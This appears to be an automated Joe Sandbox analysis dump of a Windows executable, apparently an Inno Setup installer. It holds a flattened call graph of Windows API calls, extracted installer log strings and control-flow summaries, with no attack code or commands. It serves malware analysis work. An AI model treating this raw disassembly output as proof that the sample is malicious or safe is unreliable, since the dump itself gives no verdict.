451280 21 API calls 59022->59028 59023 403744 4 API calls 59023->59026 59024->59022 59025->59022 59026->59017 59026->59021 59026->59022 59026->59023 59027 451280 21 API calls 59026->59027 59027->59026 59028->59022 59029->59011 59031 45129b 59030->59031 59035 451290 59030->59035 59036 451224 21 API calls 59031->59036 59033 4512a6 59033->59035 59037 408c14 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 59033->59037 59035->59016 59036->59033 59037->59035 59038 41ee64 59039 41ee73 IsWindowVisible 59038->59039 59040 41eea9 59038->59040 59039->59040 59041 41ee7d IsWindowEnabled 59039->59041 59041->59040 59042 41ee87 59041->59042 59043 402648 4 API calls 59042->59043 59044 41ee91 EnableWindow 59043->59044 59044->59040 59045 30e2127 59046 30e2130 59045->59046 59047 30e210a 59046->59047 59049 45dc38 59046->59049 59050 45dc47 59049->59050 59051 45dc7b VirtualAlloc 59050->59051 59055 408c14 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 59050->59055 59053 45dc93 59051->59053 59053->59047 59054 45dc76 59054->59051 59055->59054 59056 41fb68 59057 41fb71 59056->59057 59060 41fe0c 59057->59060 59059 41fb7e 59061 41fefe 59060->59061 59062 41fe23 59060->59062 59061->59059 59062->59061 59081 41f9cc GetWindowLongA GetSystemMetrics GetSystemMetrics GetWindowLongA 59062->59081 59064 41fe59 59065 41fe83 59064->59065 59066 41fe5d 59064->59066 59091 41f9cc GetWindowLongA GetSystemMetrics GetSystemMetrics GetWindowLongA 59065->59091 59082 41fbac 59066->59082 59069 41fe91 59072 41fe95 59069->59072 59073 41febb 59069->59073 59071 41fbac 10 API calls 59074 41fe81 59071->59074 59075 41fbac 10 API calls 59072->59075 59076 41fbac 10 API calls 59073->59076 59074->59059 59077 41fea7 59075->59077 59078 41fecd 59076->59078 59079 41fbac 10 API calls 59077->59079 59080 41fbac 10 API calls 59078->59080 59079->59074 59080->59074 59081->59064 59083 41fbc7 59082->59083 59084 41f94c 4 API calls 59083->59084 59085 41fbdd 59083->59085 59084->59085 59092 41f94c 59085->59092 59087 41fc25 59088 41fc48 SetScrollInfo 59087->59088 59100 41faac 59088->59100 59091->59069 59093 4181f0 59092->59093 59094 41f969 GetWindowLongA 59093->59094 59095 41f9a6 59094->59095 59096 41f986 59094->59096 59112 41f8d8 GetWindowLongA GetSystemMetrics GetSystemMetrics 59095->59112 59111 41f8d8 GetWindowLongA GetSystemMetrics GetSystemMetrics 59096->59111 59099 41f992 59099->59087 59101 41faba 59100->59101 59102 41fac2 59100->59102 59101->59071 59103 41fb01 59102->59103 59104 41faf1 59102->59104 59108 41faff 59102->59108 59114 417e58 IsWindowVisible ScrollWindow SetWindowPos 59103->59114 59113 417e58 IsWindowVisible ScrollWindow SetWindowPos 59104->59113 59105 41fb41 GetScrollPos 59105->59101 59109 41fb4c 59105->59109 59108->59105 59110 41fb5b SetScrollPos 59109->59110 59110->59101 59111->59099 59112->59099 59113->59108 59114->59108 59115 4205a8 59116 4205bb 59115->59116 59136 415b40 59116->59136 59118 420702 59119 420719 59118->59119 59143 4146e4 KiUserCallbackDispatcher 59118->59143 59121 420730 59119->59121 59144 414728 KiUserCallbackDispatcher 59119->59144 59126 420752 59121->59126 59145 420070 12 API calls 59121->59145 59122 420661 59141 420858 20 API calls 59122->59141 59123 4205f6 59123->59118 59123->59122 59129 420652 MulDiv 59123->59129 59127 42067a 59127->59118 59142 420070 12 API calls 59127->59142 59140 41a314 LocalAlloc TlsSetValue TlsGetValue TlsGetValue DeleteObject 59129->59140 59132 420697 59133 4206b3 MulDiv 59132->59133 59134 4206d6 59132->59134 59133->59134 59134->59118 59135 4206df MulDiv 59134->59135 59135->59118 59137 415b52 59136->59137 59146 414480 59137->59146 59139 415b6a 59139->59123 59140->59122 59141->59127 59142->59132 59143->59119 59144->59121 59145->59126 59147 41449a 59146->59147 59150 410658 59147->59150 59149 4144b0 59149->59139 59153 40dea4 59150->59153 59152 41065e 59152->59149 59154 40df06 59153->59154 59155 40deb7 59153->59155 59160 40df14 59154->59160 59158 40df14 19 API calls 59155->59158 59159 40dee1 59158->59159 59159->59152 59161 40df24 59160->59161 59163 40df3a 59161->59163 59172 40e29c 59161->59172 59188 40d7e0 59161->59188 59191 40e14c 59163->59191 59166 40df42 59167 40d7e0 5 API calls 59166->59167 59168 40dfae 59166->59168 59194 40dd60 59166->59194 59167->59166 59169 40e14c 5 API calls 59168->59169 59171 40df10 59169->59171 59171->59152 59208 40eb6c 59172->59208 59174 403778 4 API calls 59175 40e2d7 59174->59175 59175->59174 59176 40e38d 59175->59176 59271 40d974 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 59175->59271 59272 40e280 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 59175->59272 59177 40e3b7 59176->59177 59178 40e3a8 59176->59178 59268 40bc24 59177->59268 59217 40e5c0 59178->59217 59184 40e3b5 59185 403400 4 API calls 59184->59185 59186 40e45c 59185->59186 59186->59161 59189 40ec08 5 API calls 59188->59189 59190 40d7ea 59189->59190 59190->59161 59305 40d6bc 59191->59305 59314 40e154 59194->59314 59197 40eb6c 5 API calls 59198 40dd9e 59197->59198 59199 40eb6c 5 API calls 59198->59199 59200 40dda9 59199->59200 59201 40ddc4 59200->59201 59202 40ddbb 59200->59202 59207 40ddc1 59200->59207 59321 40dbd8 59201->59321 59324 40dcc8 19 API calls 59202->59324 59205 403420 4 API calls 59206 40de8f 59205->59206 59206->59166 59207->59205 59274 40d980 59208->59274 59211 4034e0 4 API calls 59212 40eb8f 59211->59212 59213 403744 4 API calls 59212->59213 59214 40eb96 59213->59214 59215 40d980 5 API calls 59214->59215 59216 40eba4 59215->59216 59216->59175 59218 40e5f6 59217->59218 59219 40e5ec 59217->59219 59221 40e711 59218->59221 59222 40e695 59218->59222 59223 40e6f6 59218->59223 59224 40e776 59218->59224 59225 40e638 59218->59225 59226 40e6d9 59218->59226 59227 40e67a 59218->59227 59228 40e6bb 59218->59228 59261 40e65c 59218->59261 59279 40d640 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 59219->59279 59236 40d964 5 API calls 59221->59236 59287 40e024 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 59222->59287 59292 40ea90 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 59223->59292 59231 40d964 5 API calls 59224->59231 59280 40d964 59225->59280 59290 40eba8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 59226->59290 59286 40da18 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 59227->59286 59289 40dfe4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 59228->59289 59230 403400 4 API calls 59238 40e7eb 59230->59238 59239 40e77e 59231->59239 59243 40e719 59236->59243 59238->59184 59246 40e782 59239->59246 59247 40e79b 59239->59247 59240 40e6e4 59291 409f38 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 59240->59291 59242 40e6a0 59288 40d670 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 59242->59288 59244 40e723 59243->59244 59245 40e71d 59243->59245 59293 40ec08 59244->59293 59252 40e721 59245->59252 59253 40e73c 59245->59253 59255 40ec08 5 API calls 59246->59255 59299 40e024 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 59247->59299 59249 40e661 59285 40e0d8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 59249->59285 59250 40e644 59283 40e024 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 59250->59283 59297 40e024 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 59252->59297 59259 40ec08 5 API calls 59253->59259 59255->59261 59266 40e744 59259->59266 59260 40e64f 59284 40e46c LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 59260->59284 59261->59230 59264 40e766 59298 40e4d4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 59264->59298 59296 40daa0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 59266->59296 59300 40bbd0 59268->59300 59271->59175 59272->59175 59273 40d974 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 59273->59184 59276 40d98b 59274->59276 59275 40d9c5 59275->59211 59276->59275 59278 40d9cc LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 59276->59278 59278->59276 59279->59218 59281 40ec08 5 API calls 59280->59281 59282 40d96e 59281->59282 59282->59249 59282->59250 59283->59260 59284->59261 59285->59261 59286->59261 59287->59242 59288->59261 59289->59261 59290->59240 59291->59261 59292->59261 59294 40d980 5 API calls 59293->59294 59295 40ec15 59294->59295 59295->59261 59296->59261 59297->59264 59298->59261 59299->59261 59301 40bc07 59300->59301 59302 40bbe2 59300->59302 59301->59184 59301->59273 59302->59301 59304 40bc84 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 59302->59304 59304->59301 59306 40ec08 5 API calls 59305->59306 59307 40d6c9 59306->59307 59308 40d6dc 59307->59308 59312 40ed0c LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 59307->59312 59308->59166 59310 40d6d7 59313 40d658 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 59310->59313 59312->59310 59313->59308 59315 40d964 5 API calls 59314->59315 59316 40e16b 59315->59316 59317 40dd93 59316->59317 59318 40ec08 5 API calls 59316->59318 59317->59197 59319 40e178 59318->59319 59319->59317 59325 40e0d8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 59319->59325 59326 40ad7c 19 API calls 59321->59326 59323 40dc00 59323->59207 59324->59207 59325->59317 59326->59323 59327 498578 59385 403344 59327->59385 59329 498586 59388 4056a0 59329->59388 59331 49858b 59391 406334 GetModuleHandleA GetProcAddress 59331->59391 59337 49859a 59408 410964 59337->59408 59339 49859f 59412 412938 59339->59412 59341 4985a9 59417 419050 GetVersion 59341->59417 59658 4032fc 59385->59658 59387 403349 GetModuleHandleA GetCommandLineA 59387->59329 59390 4056db 59388->59390 59659 4033bc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 59388->59659 59390->59331 59392 406350 59391->59392 59393 406357 GetProcAddress 59391->59393 59392->59393 59394 406366 59393->59394 59395 40636d GetProcAddress 59393->59395 59394->59395 59396 406380 59395->59396 59397 40637c SetProcessDEPPolicy 59395->59397 59398 409954 59396->59398 59397->59396 59660 40902c 59398->59660 59403 408728 7 API calls 59404 409977 59403->59404 59675 409078 GetVersionExA 59404->59675 59407 409b88 6F551CD0 59407->59337 59409 41096e 59408->59409 59410 4109ad GetCurrentThreadId 59409->59410 59411 4109c8 59410->59411 59411->59339 59677 40af0c 59412->59677 59416 412964 59416->59341 59689 41de34 8 API calls 59417->59689 59658->59387 59659->59390 59661 408cc4 5 API calls 59660->59661 59662 40903d 59661->59662 59663 4085e4 GetSystemDefaultLCID 59662->59663 59667 40861a 59663->59667 59664 406df4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 59664->59667 59665 408570 LocalAlloc TlsSetValue TlsGetValue TlsGetValue GetLocaleInfoA 59665->59667 59666 403450 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 59666->59667 59667->59664 59667->59665 59667->59666 59671 40867c 59667->59671 59668 406df4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 59668->59671 59669 408570 LocalAlloc TlsSetValue TlsGetValue TlsGetValue GetLocaleInfoA 59669->59671 59670 403450 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 59670->59671 59671->59668 59671->59669 59671->59670 59672 4086ff 59671->59672 59673 403420 4 API calls 59672->59673 59674 408719 59673->59674 59674->59403 59676 40908f 59675->59676 59676->59407 59679 40af13 59677->59679 59678 40af32 59681 41101c 59678->59681 59679->59678 59688 40ae44 19 API calls 59679->59688 59682 41103e 59681->59682 59683 406df4 5 API calls 59682->59683 59684 403450 4 API calls 59682->59684 59685 41105d 59682->59685 59683->59682 59684->59682 59686 403400 4 API calls 59685->59686 59687 411072 59686->59687 59687->59416 59688->59679 59690 41deae 59689->59690 60966 42f530 60967 42f53b 60966->60967 60968 42f53f NtdllDefWindowProc_A 60966->60968 60968->60967 60969 4358f0 60970 435905 60969->60970 60974 43591f 60970->60974 60975 4352d8 60970->60975 60981 435322 60975->60981 60985 435308 60975->60985 60976 403400 4 API calls 60977 435727 60976->60977 60977->60974 60988 435738 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 60977->60988 60978 446db4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 60978->60985 60979 403450 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 60979->60985 60980 402648 4 API calls 60980->60985 60981->60976 60983 431cb0 4 API calls 60983->60985 60984 4038a4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 60984->60985 60985->60978 60985->60979 60985->60980 60985->60981 60985->60983 60985->60984 60986 403744 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 60985->60986 60989 4343c0 60985->60989 61001 434b84 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 60985->61001 60986->60985 60988->60974 60990 43447d 60989->60990 60991 4343ed 60989->60991 61020 434320 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 60990->61020 60993 403494 4 API calls 60991->60993 60995 4343fb 60993->60995 60994 43446f 60997 403400 4 API calls 60994->60997 60996 403778 4 API calls 60995->60996 60999 43441c 60996->60999 60998 4344cd 60997->60998 60998->60985 60999->60994 61002 494314 60999->61002 61001->60985 61003 49434c 61002->61003 61004 4943e4 61002->61004 61005 403494 4 API calls 61003->61005 61021 448940 61004->61021 61007 494357 61005->61007 61008 494367 61007->61008 61011 4037b8 4 API calls 61007->61011 61009 403400 4 API calls 61008->61009 61010 494408 61009->61010 61012 403400 4 API calls 61010->61012 61014 494380 61011->61014 61013 494410 61012->61013 61013->60999 61014->61008 61015 4037b8 4 API calls 61014->61015 61016 4943a3 61015->61016 61017 403778 4 API calls 61016->61017 61018 4943d4 61017->61018 61019 403634 4 API calls 61018->61019 61019->61004 61020->60994 61022 448965 61021->61022 61032 4489a8 61021->61032 61023 403494 4 API calls 61022->61023 61027 448970 61023->61027 61024 4489bc 61026 403400 4 API calls 61024->61026 61028 4489ef 61026->61028 61029 4037b8 4 API calls 61027->61029 61028->61008 61030 44898c 61029->61030 61031 4037b8 4 API calls 61030->61031 61031->61032 61032->61024 61033 44853c 61032->61033 61034 403494 4 API calls 61033->61034 61035 448572 61034->61035 61036 4037b8 4 API calls 61035->61036 61037 448584 61036->61037 61038 403778 4 API calls 61037->61038 61039 4485a5 61038->61039 61040 4037b8 4 API calls 61039->61040 61041 4485bd 61040->61041 61042 403778 4 API calls 61041->61042 61043 4485e8 61042->61043 61044 4037b8 4 API calls 61043->61044 61054 448600 61044->61054 61045 4486d3 61049 4486db GetProcAddress 61045->61049 61046 448638 61047 403420 4 API calls 61046->61047 61050 448718 61047->61050 61048 44866d LoadLibraryA 61048->61054 61052 4486ee 61049->61052 61050->61024 61051 44865b LoadLibraryExA 61051->61054 61052->61046 61053 403b80 4 API calls 61053->61054 61054->61045 61054->61046 61054->61048 61054->61051 61054->61053 61055 403450 4 API calls 61054->61055 61057 43da98 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 61054->61057 61055->61054 61057->61054 61058 40ce34 61061 406f18 WriteFile 61058->61061 61062 406f35 61061->61062 61063 4222f4 61064 422303 61063->61064 61069 421284 61064->61069 61067 422323 61070 4212f3 61069->61070 61084 421293 61069->61084 61073 421304 61070->61073 61094 4124e0 GetMenuItemCount GetMenuStringA GetMenuState 61070->61094 61072 421332 61076 4213a5 61072->61076 61081 42134d 61072->61081 61073->61072 61075 4213ca 61073->61075 61074 4213a3 61077 4213f6 61074->61077 61096 421e3c 11 API calls 61074->61096 61075->61074 61080 4213de SetMenu 61075->61080 61076->61074 61083 4213b9 61076->61083 61097 4211cc 10 API calls 61077->61097 61080->61074 61081->61074 61087 421370 GetMenu 61081->61087 61082 4213fd 61082->61067 61092 4221f8 10 API calls 61082->61092 61086 4213c2 SetMenu 61083->61086 61084->61070 61093 408d34 19 API calls 61084->61093 61086->61074 61088 421393 61087->61088 61089 42137a 61087->61089 61095 4124e0 GetMenuItemCount GetMenuStringA GetMenuState 61088->61095 61091 42138d SetMenu 61089->61091 61091->61088 61092->61067 61093->61084 61094->61073 61095->61074 61096->61077 61097->61082 61098 40d07c 61099 40d084 61098->61099 61100 40d0ae 61099->61100 61101 40d0b2 61099->61101 61102 40d0a7 61099->61102 61104 40d0b6 61101->61104 61105 40d0c8 61101->61105 61111 4062a0 GlobalHandle GlobalUnlock GlobalFree 61102->61111 61110 406274 GlobalAlloc GlobalLock 61104->61110 61112 406284 GlobalHandle GlobalUnlock GlobalReAlloc GlobalLock 61105->61112 61108 40d0c4 61108->61100 61109 408cc4 5 API calls 61108->61109 61109->61100 61110->61108 61111->61100 61112->61108 61113 44b4b8 61114 44b4c6 61113->61114 61116 44b4e5 61113->61116 61115 44b39c 11 API calls 61114->61115 61114->61116 61115->61116 61117 448738 61118 448766 61117->61118 61119 44876d 61117->61119 61123 403400 4 API calls 61118->61123 61120 448781 61119->61120 61121 44853c 7 API calls 61119->61121 61120->61118 61122 403494 4 API calls 61120->61122 61121->61120 61125 44879a 61122->61125 61124 448917 61123->61124 61126 4037b8 4 API calls 61125->61126 61127 4487b6 61126->61127 61128 4037b8 4 API calls 61127->61128 61129 4487d2 61128->61129 61129->61118 61130 4487e6 61129->61130 61131 4037b8 4 API calls 61130->61131 61132 448800 61131->61132 61133 431be0 4 API calls 61132->61133 61134 448822 61133->61134 61135 431cb0 4 API calls 61134->61135 61142 448842 61134->61142 61135->61134 61136 448898 61149 442344 61136->61149 61137 448880 61137->61136 61161 4435e0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 61137->61161 61141 4488cc GetLastError 61162 4484d0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 61141->61162 61142->61137 61160 4435e0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 61142->61160 61144 4488db 61163 443620 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 61144->61163 61146 4488f0 61164 443630 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 61146->61164 61148 4488f8 61150 443322 61149->61150 61151 44237d 61149->61151 61153 403400 4 API calls 61150->61153 61152 403400 4 API calls 61151->61152 61154 442385 61152->61154 61155 443337 61153->61155 61156 431be0 4 API calls 61154->61156 61155->61141 61158 442391 61156->61158 61157 443312 61157->61141 61158->61157 61165 441a1c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 61158->61165 61160->61142 61161->61136 61162->61144 61163->61146 61164->61148 61165->61158 61166 4165fc 73A25CF0 61167 42e3ff SetErrorMode 61168 30e1070 61169 30e107c 61168->61169 61171 30e1084 61168->61171 61170 30e1092 61171->61170 61173 45dc38 5 API calls 61171->61173 61172 30e10d3 61173->61172
                                                              Strings
                                                              • Time stamp of existing file: (failed to read), xrefs: 00470CDF
                                                              • Non-default bitness: 32-bit, xrefs: 00470B63
                                                              • Couldn't read time stamp. Skipping., xrefs: 00470FDD
                                                              • Version of our file: (none), xrefs: 00470DA4
                                                              • Installing into GAC, xrefs: 004719A2
                                                              • User opted not to overwrite the existing file. Skipping., xrefs: 004710F5
                                                              • Same time stamp. Skipping., xrefs: 00470FFD
                                                              • Same version. Skipping., xrefs: 00470F8D
                                                              • , xrefs: 00470E77, 00471048, 004710C6
                                                              • Existing file's SHA-1 hash is different from our file. Proceeding., xrefs: 00470F6C
                                                              • Existing file is a newer version. Skipping., xrefs: 00470EAA
                                                              • Version of our file: %u.%u.%u.%u, xrefs: 00470D98
                                                              • Existing file's SHA-1 hash matches our file. Skipping., xrefs: 00470F5D
                                                              • Non-default bitness: 64-bit, xrefs: 00470B57
                                                              • Uninstaller requires administrator: %s, xrefs: 0047141D
                                                              • Stripped read-only attribute., xrefs: 0047116F
                                                              • .tmp, xrefs: 0047125F
                                                              • Failed to read existing file's SHA-1 hash. Proceeding., xrefs: 00470F78
                                                              • Version of existing file: (none), xrefs: 00470FA2
                                                              • Incrementing shared file count (32-bit)., xrefs: 00471833
                                                              • -- File entry --, xrefs: 004709A3
                                                              • Skipping due to "onlyifdoesntexist" flag., xrefs: 00470C76
                                                              • Incrementing shared file count (64-bit)., xrefs: 0047181A
                                                              • Dest file is protected by Windows File Protection., xrefs: 00470B95
                                                              • Existing file is protected by Windows File Protection. Skipping., xrefs: 00471094
                                                              • InUn, xrefs: 004713ED
                                                              • Version of existing file: %u.%u.%u.%u, xrefs: 00470E24
                                                              • Existing file has a later time stamp. Skipping., xrefs: 00471077
                                                              • Dest file exists., xrefs: 00470C63
                                                              • Time stamp of our file: (failed to read), xrefs: 00470C4F
                                                              • Installing the file., xrefs: 004711B1
                                                              • Time stamp of our file: %s, xrefs: 00470C43
                                                              • Will register the file (a DLL/OCX) later., xrefs: 004717AD
                                                              • @, xrefs: 00470A58
                                                              • Failed to strip read-only attribute., xrefs: 0047117B
                                                              • Skipping due to "onlyifdestfileexists" flag., xrefs: 004711A2
                                                              • Dest filename: %s, xrefs: 00470B3C
                                                              • User opted not to strip the existing file's read-only attribute. Skipping., xrefs: 0047113E
                                                              • Will register the file (a type library) later., xrefs: 004717A1
                                                              • Time stamp of existing file: %s, xrefs: 00470CD3
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $-- File entry --$.tmp$@$Couldn't read time stamp. Skipping.$Dest file exists.$Dest file is protected by Windows File Protection.$Dest filename: %s$Existing file has a later time stamp. Skipping.$Existing file is a newer version. Skipping.$Existing file is protected by Windows File Protection. Skipping.$Existing file's SHA-1 hash is different from our file. Proceeding.$Existing file's SHA-1 hash matches our file. Skipping.$Failed to read existing file's SHA-1 hash. Proceeding.$Failed to strip read-only attribute.$InUn$Incrementing shared file count (32-bit).$Incrementing shared file count (64-bit).$Installing into GAC$Installing the file.$Non-default bitness: 32-bit$Non-default bitness: 64-bit$Same time stamp. Skipping.$Same version. Skipping.$Skipping due to "onlyifdestfileexists" flag.$Skipping due to "onlyifdoesntexist" flag.$Stripped read-only attribute.$Time stamp of existing file: %s$Time stamp of existing file: (failed to read)$Time stamp of our file: %s$Time stamp of our file: (failed to read)$Uninstaller requires administrator: %s$User opted not to overwrite the existing file. Skipping.$User opted not to strip the existing file's read-only attribute. Skipping.$Version of existing file: %u.%u.%u.%u$Version of existing file: (none)$Version of our file: %u.%u.%u.%u$Version of our file: (none)$Will register the file (a DLL/OCX) later.$Will register the file (a type library) later.
                                                              • API String ID: 0-4021121268
                                                              • Opcode ID: 37ba39076e8f210f702745b7d33ab1b6cbc29d83952fc568139b6c082dd49221
                                                              • Instruction ID: 00dcbbebc37e67597ddb11db3b00c056d98a3663d13b65a1c96947d1bb872b77
                                                              • Opcode Fuzzy Hash: 37ba39076e8f210f702745b7d33ab1b6cbc29d83952fc568139b6c082dd49221
                                                              • Instruction Fuzzy Hash: 2C927534A04288DFDB11DFA9C845BDDBBB5AF05304F5480ABE848AB392C7789E45CB59

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1546 42e0ac-42e0bd 1547 42e0c8-42e0ed AllocateAndInitializeSid 1546->1547 1548 42e0bf-42e0c3 1546->1548 1549 42e297-42e29f 1547->1549 1550 42e0f3-42e110 GetVersion 1547->1550 1548->1549 1551 42e112-42e127 GetModuleHandleA GetProcAddress 1550->1551 1552 42e129-42e12b 1550->1552 1551->1552 1553 42e152-42e16c GetCurrentThread OpenThreadToken 1552->1553 1554 42e12d-42e13b CheckTokenMembership 1552->1554 1557 42e1a3-42e1cb GetTokenInformation 1553->1557 1558 42e16e-42e178 GetLastError 1553->1558 1555 42e141-42e14d 1554->1555 1556 42e279-42e28f FreeSid 1554->1556 1555->1556 1561 42e1e6-42e20a call 402648 GetTokenInformation 1557->1561 1562 42e1cd-42e1d5 GetLastError 1557->1562 1559 42e184-42e197 GetCurrentProcess OpenProcessToken 1558->1559 1560 42e17a-42e17f call 4031bc 1558->1560 1559->1557 1565 42e199-42e19e call 4031bc 1559->1565 1560->1549 1571 42e218-42e220 1561->1571 1572 42e20c-42e216 call 4031bc * 2 1561->1572 1562->1561 1566 42e1d7-42e1e1 call 4031bc * 2 1562->1566 1565->1549 1566->1549 1577 42e222-42e223 1571->1577 1578 42e253-42e271 call 402660 CloseHandle 1571->1578 1572->1549 1582 42e225-42e238 EqualSid 1577->1582 1585 42e23a-42e247 1582->1585 1586 42e24f-42e251 1582->1586 1585->1586 1588 42e249-42e24d 1585->1588 1586->1578 1586->1582 1588->1578
                                                              APIs
                                                              • AllocateAndInitializeSid.ADVAPI32(00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E0E6
                                                              • GetVersion.KERNEL32(00000000,0042E290,?,00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E103
                                                              • GetModuleHandleA.KERNEL32(advapi32.dll,CheckTokenMembership,00000000,0042E290,?,00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E11C
                                                              • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042E122
                                                              • CheckTokenMembership.KERNELBASE(00000000,00000000,?,00000000,0042E290,?,00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E137
                                                              • FreeSid.ADVAPI32(00000000,0042E297,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E28A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: AddressAllocateCheckFreeHandleInitializeMembershipModuleProcTokenVersion
                                                              • String ID: CheckTokenMembership$advapi32.dll
                                                              • API String ID: 2252812187-1888249752
                                                              • Opcode ID: dfa08fd94d7286335d22f987ae6d0bc512a1d03bb366aa7b3c061580d116a88c
                                                              • Instruction ID: 1c76bb1748f4203a7925b196b2d5623075850b54fd141b793a49aa5c8bf5bf77
                                                              • Opcode Fuzzy Hash: dfa08fd94d7286335d22f987ae6d0bc512a1d03bb366aa7b3c061580d116a88c
                                                              • Instruction Fuzzy Hash: 22517571B44615EEEB10EAE6A842BBF7BACDB09304F9404BBB501F7282D57C9904867D

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1610 4502ac-4502b9 1611 4502bf-4502cc GetVersion 1610->1611 1612 450368-450372 1610->1612 1611->1612 1613 4502d2-4502e8 LoadLibraryA 1611->1613 1613->1612 1614 4502ea-450363 GetProcAddress * 6 1613->1614 1614->1612
                                                              APIs
                                                              • GetVersion.KERNEL32(00480618), ref: 004502BF
                                                              • LoadLibraryA.KERNEL32(Rstrtmgr.dll,00480618), ref: 004502D7
                                                              • GetProcAddress.KERNEL32(6D120000,RmStartSession), ref: 004502F5
                                                              • GetProcAddress.KERNEL32(6D120000,RmRegisterResources), ref: 0045030A
                                                              • GetProcAddress.KERNEL32(6D120000,RmGetList), ref: 0045031F
                                                              • GetProcAddress.KERNEL32(6D120000,RmShutdown), ref: 00450334
                                                              • GetProcAddress.KERNEL32(6D120000,RmRestart), ref: 00450349
                                                              • GetProcAddress.KERNEL32(6D120000,RmEndSession), ref: 0045035E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
